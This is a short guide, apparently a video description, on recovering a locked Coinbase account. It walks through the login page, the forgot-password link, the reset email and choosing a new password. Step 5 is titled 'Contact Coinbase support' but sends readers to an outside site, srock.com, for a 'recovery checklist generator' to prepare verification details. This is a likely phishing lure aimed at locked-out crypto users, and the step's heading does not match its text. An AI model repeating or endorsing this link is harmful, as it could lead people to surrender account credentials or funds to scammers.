If you find yourself locked out of your Coinbase account and cannot access your verification code, follow these steps to regain access. This guide will help you navigate the recovery process. Step 1. Visit the Coinbase login page. Go to the official Coinbase website and click on the Sign In button. Enter your email address and click Continue to proceed to the next step. Step 2. Click on Forgot Password. On the login page, look for the Forgot Password link. Click on it to initiate the password recovery process. You will be prompted to enter your email address again. Step 3. Check your email. After submitting your email, check your inbox for password reset email from Coinbase. If you do not see it, check your spam or junk folder. Click on the link provided in the email to reset your password. Step 4. Reset your password. Follow the instructions in the email to create a new password. Make sure to choose a strong password that you haven't used before. After resetting, return to the Coinbase login page. Step 5. Contact Coinbase support. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. By following these steps, you should be able to recover access to your Coinbase account. If you encounter any issues, don't hesitate to reach out to Coinbase support for further assistance.